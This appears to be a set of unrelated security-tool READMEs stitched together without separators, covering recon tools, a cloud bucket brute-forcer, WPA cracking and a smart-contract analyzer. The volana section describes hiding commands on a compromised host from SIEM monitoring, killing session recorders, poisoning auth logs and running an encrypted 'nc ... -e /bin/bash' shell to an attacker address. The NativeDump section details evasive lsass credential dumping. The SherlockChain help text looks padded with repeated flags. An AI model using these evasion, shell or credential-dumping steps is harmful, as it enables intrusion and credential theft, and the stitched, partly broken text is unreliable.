secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and is designed to improve productivity for pentesters and security researchers.
- Curated list of commands
- Unified input options
- Unified output schema
- CLI and library usage
- Distributed options with Celery
- Complexity from simple tasks to complex workflows
secator integrates the following tools:
Name | Description | Category |
---|---|---|
httpx | Fast HTTP prober. | http |
cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
gospider | Fast web spider written in Go. | http/crawler |
katana | Next-generation crawling and spidering framework. | http/crawler |
dirsearch | Web path discovery. | http/fuzzer |
feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
ffuf | Fast web fuzzer written in Go. | http/fuzzer |
h8mail | Email OSINT and breach hunting tool. | osint |
dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
subfinder | Fast subdomain finder. | recon/dns |
fping | Find alive hosts on local networks. | recon/ip |
mapcidr | Expand CIDR ranges into IPs. | recon/ip |
naabu | Fast port discovery tool. | recon/port |
maigret | Hunt for user accounts across many websites. | recon/user |
gf | A wrapper around grep to avoid typing common patterns. | tagger |
grype | A vulnerability scanner for container images and filesystems. | vuln/code |
dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
wpscan | WordPress security scanner. | vuln/multi |
nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
nuclei | Fast and customisable vulnerability scanner based on a simple YAML-based DSL. | vuln/multi |
searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).
pipx install secator
pip install secator
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run: alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal: secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator uses external tools, so you might need to install the languages used by those tools, assuming they are not already installed on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool which should work on all systems supporting apt:
secator install tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use: secator install tools httpx
Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.
secator comes installed with a minimal set of dependencies.
There are several addons available for secator:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
And more... To list all the tasks, workflows, and scans that you can use:
secator x --help
secator w --help
secator s --help
To go deeper with secator, check out:
- Our complete documentation
- Our getting started tutorial video
- Our Medium post
- Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
Reconnaissance is the first phase of penetration testing, meaning gathering information before planning any real attacks. Ashok is an incredibly fast recon tool for penetration testers, specially designed for the reconnaissance phase. In Ashok-v1.1 you can find the advanced Google dorker and Wayback crawling machine.
- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers
~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip install -r requirements.txt
A detailed usage guide is available in the Usage section of the Wiki, but an index of options is given below:
Ashok can be launched using a lightweight Python3.8-Alpine Docker image.
$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.
The complete writeup is available here.
We are always thinking of something we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers.
Here is the list of issues with previous approaches that we tried to fix:
Microsoft: - Storage - Apps
Amazon: - Storage - Apps
Google: - Storage - Apps
DigitalOcean: - Storage
Vultr: - Storage
Linode: - Storage
Alibaba: - Storage
1.0.0
Just download the latest release for your operating system and follow the usage.
To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder containing a config.yaml file.
It looks like this:
providers: ["amazon","alibaba","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY
For the IPINFO API, you can register and get a free key at IPINFO. The environments list is used to generate URL mutations, such as test-keyword.target.region and test.keyword.target.region, etc. (a small sketch of this mutation idea follows below).
We provide some wordlists out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.
After setting up your API key, you are ready to use CloudBrute.
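To make the mutation idea concrete, here is a rough Python sketch of how a keyword and the environments list expand into candidate names. The exact patterns and the S3 URL template are illustrative assumptions, not CloudBrute's actual Go code:

```python
# Toy mutation generator: keyword + environments -> candidate bucket names.
keyword = "target"
environments = ["test", "dev", "prod", "stage", "staging", "bak"]

candidates = {keyword}
for env in environments:
    candidates.update({
        f"{env}-{keyword}", f"{keyword}-{env}",   # e.g. test-target, target-bak
        f"{env}.{keyword}", f"{keyword}.{env}",   # e.g. test.target
    })

for name in sorted(candidates):
    # Example provider URL pattern (Amazon S3); each provider has its own.
    print(f"https://{name}.s3.amazonaws.com")
```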
CloudBrute V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config
For example:
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
Please note that the -k keyword is used to generate URLs, so if you want the full domain to be part of the mutation, use it for both the domain (-d) and keyword (-k) arguments.
If a cloud provider is not detected, or you want to force searching on a specific provider, you can use the -c option.
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt
Read the usage.
Make sure you read the usage correctly, and if you think you found a bug, open an issue.
It's because you are using public proxies; use private, higher-quality proxies instead. You can use ProxyFor to verify working proxies with your chosen provider.
Change the -T (timeout) option to get the best results for your run.
Inspired by every single repo listed here.
During a pentest, an important aspect is stealth. For this reason, you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making the after-the-fact cleaning part alone useless. volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way, you clear your tracks DURING your passage.
You need to get an interactive shell (find a way to spawn it, you are a hacker, it's your job!). Then download volana on the target machine and launch it. That's it: you can now type the commands you want to be stealthily executed.
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -LO https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana Β» [command]
Keywords for the volana console:
* ring: enable ring mode, i.e. each command is launched alongside plenty of others to cover tracks (against solutions that monitor system calls)
* exit: exit the volana console
Imagine you have a non-interactive shell (webshell or blind RCE); you can use the encrypt and decrypt subcommands. Beforehand, you need to build volana with an embedded encryption key.
On attacker machine
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here, a nc bindshell to obtain an interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy the encrypted command and execute it with your RCE on the target machine:
./volana decr [encrypted_command]
## Now you have a bindshell; spawn it to make it interactive and use volana as usual to stay stealthy (./volana). Don't forget to remove the volana binary before leaving (because the decryption key can easily be retrieved from it)
Why not just hide the command with echo [command] | base64 and decode it on the target with echo [encoded_command] | base64 -d | bash? Because we want to be protected against systems that trigger an alert on base64 use or that look for base64 text in commands. Also, we want to make investigation difficult, and base64 isn't a real barrier.
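Conceptually, the encrypt/decrypt pair is just a symmetric cipher over the command string, with the key baked into the binary at build time. Here is a toy Python sketch of the idea (volana itself is written in Go, and its actual cipher and key handling may differ):

```python
from cryptography.fernet import Fernet  # pip install cryptography

# In the real workflow the key is embedded at build time; generated here for the demo.
key = Fernet.generate_key()
cipher = Fernet(key)

# Attacker side: encrypt the command to execute on the target.
token = cipher.encrypt(b"nc 10.0.0.1 4444 -e /bin/bash")
print(token)  # opaque ciphertext; the plaintext command never appears

# Target side: decrypt (and, in the real tool, execute) the command.
print(cipher.decrypt(token).decode())
```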
Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.
By detected, we mean being able to trigger an alert if a certain command has been executed.
* Shell command history: only the volana launching command line will be caught. However, by adding a space before executing it, the default bash behavior is to not save it (.bash_history, .zsh_history, etc.)
* System call monitoring (e.g. opensnoop)
* Terminal session recording (script, screen -L, sexonthebash, ovh-ttyrec, etc.) => pkill -9 script
* screen is a bit more difficult to avoid; however, it does not register input (secret input: stty -echo => avoid), or use volana with encryption
* Authentication logs (/var/log/auth.log) record sudo and su commands; these can be poisoned (logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
* LD_PRELOAD injection to make logs

Sorry for the clickbait title, but no money will be provided for contributors.
Let me know if you have found:
* a way to detect volana
* a way to spy on the console that volana does not evade
* a way to avoid a detection system
NativeDump allows you to dump the lsass process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List streams).
Usage:
NativeDump.exe [DUMP_FILE]
The default file name is "proc_
The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoint, CrowdStrike...) and is so far undetected. However, it does not work if PPL is enabled on the system.
Some benefits of this technique are:
- It does not use the well-known dbghelp!MinidumpWriteDump function
- It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library
- The Minidump file does not have to be written to disk; you can transfer its bytes (encoded or encrypted) to a remote machine
The project has three branches at the moment (apart from the main branch with the basic technique):
ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk
delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding
remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding
After reading Minidump undocumented structures, its structure can be summed up to:
I created a parsing tool which can be helpful: MinidumpParser.
We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.
The header is a 32-bytes structure which can be defined in C# as:
public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}
The required values are:
- Signature: Fixed value 0x504D444D (the "MDMP" string)
- Version: Fixed value 0xA793 (Microsoft constant MINIDUMP_VERSION)
- NumberOfStreams: Fixed value 3, the three streams required for the file
- StreamDirectoryRVA: Fixed value 0x20 (32 bytes), the size of the header
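As a quick illustration of the layout, here is a minimal Python sketch (NativeDump itself is C#) that packs a 32-byte header with these fixed values, following the standard MINIDUMP_HEADER field order:

```python
import struct

# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp, Flags (32 bytes in total).
header = struct.pack(
    "<IIIIIIQ",
    0x504D444D,  # Signature: "MDMP"
    0xA793,      # Version: MINIDUMP_VERSION (low word)
    3,           # NumberOfStreams: SystemInfo, ModuleList, Memory64List
    0x20,        # StreamDirectoryRva: directory starts right after the header
    0,           # CheckSum (unused here)
    0,           # TimeDateStamp (unused here)
    0,           # Flags
)
assert len(header) == 32
```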
Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the size is 36 bytes. The C# struct definition for an entry is:
public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}
The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:
ID | Stream Type |
---|---|
0x00 | UnusedStream |
0x01 | ReservedStream0 |
0x02 | ReservedStream1 |
0x03 | ThreadListStream |
0x04 | ModuleListStream |
0x05 | MemoryListStream |
0x06 | ExceptionStream |
0x07 | SystemInfoStream |
0x08 | ThreadExListStream |
0x09 | Memory64ListStream |
0x0A | CommentStreamA |
0x0B | CommentStreamW |
0x0C | HandleDataStream |
0x0D | FunctionTableStream |
0x0E | UnloadedModuleListStream |
0x0F | MiscInfoStream |
0x10 | MemoryInfoListStream |
0x11 | ThreadInfoListStream |
0x12 | HandleOperationListStream |
0x13 | TokenStream |
0x16 | ProcessVmCountersStream |
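Continuing the Python illustration, the three directory entries can be packed the same way; the sizes and offsets below follow the fixed layout described in the next sections:

```python
import struct

# Three 12-byte entries: (StreamType, Size, Location/RVA).
entries = [
    (7, 56, 0x44),   # SystemInfoStream at offset 68
    (4, 112, 0x7C),  # ModuleListStream at offset 124
    (9, 0, 0x12A),   # Memory64ListStream; size depends on the dumped regions
]
directory = b"".join(struct.pack("<III", *entry) for entry in entries)
assert len(directory) == 36
```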
The first stream is the SystemInfo stream, with ID 7. The size is 56 bytes and it will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:
public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}
The required values are:
- ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems
- MajorVersion, MinorVersion and BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
The second stream is the ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInfo stream, and it will also have a fixed size of 112 bytes, since it will hold the entry for a single module, the only one needed for the parsing to be correct: "lsasrv.dll".
The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:
public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}
As there is only one, it gets simplified to:
public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}
The required values are:
- NumberOfModules: Fixed value 1
- BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter)
- Size: Obtained by adding all memory region sizes starting from BaseAddress until reaching one with a size of 4096 bytes (0x1000), the .text section of another library
- PointerName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located right after the stream itself at offset 236 (0xEC)
The third stream is the Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.
public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}
Each memory region entry is a 16-byte structure:
public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}
The required values are:
- NumberOfEntries: Number of memory regions, obtained after looping over them
- MemoryRegionsBaseAddress: Location of the start of the memory region bytes, calculated by adding up the sizes of all 16-byte memory entries
- Address and Size: Obtained for each valid region while looping over them
There are prerequisites to looping over the memory regions of the lsass.exe process, which can be solved using only NTAPIs:
With this, it is possible to traverse process memory by calling:
- ntdll!NtQueryVirtualMemory: returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
- If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populate one entry of the Memory64List stream and the bytes can be added to the file
- If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
- ntdll!NtReadVirtualMemory: adds the bytes of that region to the Minidump file after the Memory64List stream
After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.
sttr is a command-line tool that allows you to quickly run various transformation operations on strings.
// With input prompt
sttr
// Direct input
sttr md5 "Hello World"
// File input
sttr md5 file.text
sttr base64-encode image.jpg
// Reading from different processor like cat, curl, printf etc..
echo "Hello World" | sttr md5
cat file.txt | sttr md5
// Writing output to a file
sttr yaml-json file.yaml > file-output.json
You can run the curl command below to install it somewhere in your PATH for easy use. Ideally it will be installed in the ./bin folder.
curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh
curl -sS https://webi.sh/sttr | sh
curl.exe https://webi.ms/sttr | powershell
See here
If you are on macOS and using Homebrew, you can install sttr with the following:
brew tap abhimanyu003/sttr
brew install sttr
sudo snap install sttr
yay -S sttr-bin
scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
scoop install sttr
go install github.com/abhimanyu003/sttr@latest
Download the pre-compiled binaries from the Release! page and copy them to the desired location.
Run the sttr command.
// For interactive menu
sttr
// Provide your input
// Press enter twice to open the operations menu
// Press `/` to filter various operations.
// You can also press the Up/Down arrows to select various operations.
sttr -h
// Example
sttr zeropad -h
sttr md5 -h
sttr {command-name} {filename}
sttr base64-encode image.jpg
sttr md5 file.txt
sttr md-html Readme.md
sttr yaml-json file.yaml > file-output.json
curl https://jsonplaceholder.typicode.com/users | sttr json-yaml
sttr md5 hello | sttr base64-encode
echo "Hello World" | sttr base64-encode | sttr md5
These are a few locations where sttr was highlighted; many thanks to all of you. Please feel free to add to the list any blogs or videos you may have made that discuss sttr.
Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface, simplifying the data collection and analysis processes for researchers and cybersecurity professionals.
Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.
This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.
The process and objective are simple: we can get a clear perspective on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which packages are actually being executed.
The packages needed are mentioned in the requirements.txt file and can be installed using pip:
pip3 install -r requirements.txt
Mount the image:
Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes, but it's still quite a task for me.
Argument | Description |
---|---|
--analysis-mode | Specifies the mode of operation. Default is static . Choices are static and chroot . |
--static-type | Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service . |
--volume-path | Specifies the path to the mounted volume. Default is /mnt . |
--save-file | Specifies the output file for JSON output. |
--info-graphic | Specifies whether to generate visual plots for CHROOT analysis. Default is True . |
--pkg-mgr | Manually specify the package manager, or omit this option for automatic detection. |
APT:
- Static Info Analysis:
- This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
- It analyzes the packages installed on the mounted volume located at /mnt.
- It saves the output in a JSON file named output.json.
- It generates visual plots for CHROOT analysis.
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
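For context, the Info Directory method essentially boils down to reading dpkg's package database from the mounted volume. A minimal standalone Python sketch of that idea (not the tool's actual code) might look like:

```python
from pathlib import Path

def list_apt_packages(volume="/mnt"):
    """Yield (package, version) pairs for packages marked installed
    in dpkg's status database on a mounted volume."""
    status = Path(volume, "var/lib/dpkg/status").read_text(errors="replace")
    for stanza in status.split("\n\n"):
        fields = dict(
            line.split(": ", 1)
            for line in stanza.splitlines()
            if ": " in line and not line.startswith(" ")
        )
        if fields.get("Status", "").endswith("installed"):
            yield fields.get("Package"), fields.get("Version")

for name, version in list_apt_packages("/mnt"):
    print(name, version)
```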
Static Service Analysis:
- This command runs the program in static analysis mode, specifically using the Service file analysis method.
- It analyzes the packages installed on the mounted volume located at /custom_mount.
- It saves the output in a JSON file named output.json.
- It does not generate visual plots for CHROOT analysis.
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
```
Chroot analysis with or without graphic output:
- It analyzes the packages installed on the mounted volume located at /mnt.
- It saves the output in a JSON file named output.json.
- Set --info-graphic to True for visual plots, else False.
```bash
python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```
RPM - Static Analysis:
- Similar to how it's done on APT, but only one type of static scan is available for now.
```bash
python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
```
RPM - Chroot Analysis:
```bash
python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
```
Currently the tool works on Debian and Red Hat based images. I can guarantee the Debian outputs, but the Red Hat ones still need work; they are not perfect.
On the pacman side of things, I am trying to find a reliable way of accessing the pacman DB for static analysis.
For the workings and process related documentation please read the wiki page: Link
Ideas regarding this topic are welcome in the discussions page.
Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication-phase data in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate subsequent traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; this ultimately allows the password that protects the network to be revealed. The vulnerability has to be considered exceptionally disastrous, as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background, see this article on the project's blog (outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X and Linux as operating systems, and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.
Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
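For reference, a single PMK computation is just PBKDF2-HMAC-SHA1 over the passphrase and SSID with 4096 iterations and a 256-bit output. A one-function Python sketch of the standard WPA/WPA2-PSK derivation (not Pyrit's optimized code):

```python
import hashlib

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key as defined for WPA/WPA2-PSK:
    PBKDF2(HMAC-SHA1, passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32
    )

print(wpa_pmk("password", "linksys").hex())
```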
These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue at https://github.com/JPaulMora/Pyrit/issues.
SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.
To install SherlockChain, follow these steps:
git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .
SherlockChain's AI integration brings several advanced capabilities to the table:
Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:
- Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
- Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
- Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
- AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
- Framework Integration: The --truffle and --truffle-build-directory options facilitate the integration of SherlockChain into popular development frameworks like Truffle.

The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.
Example usage:
sherlockchain --help
This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.
usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
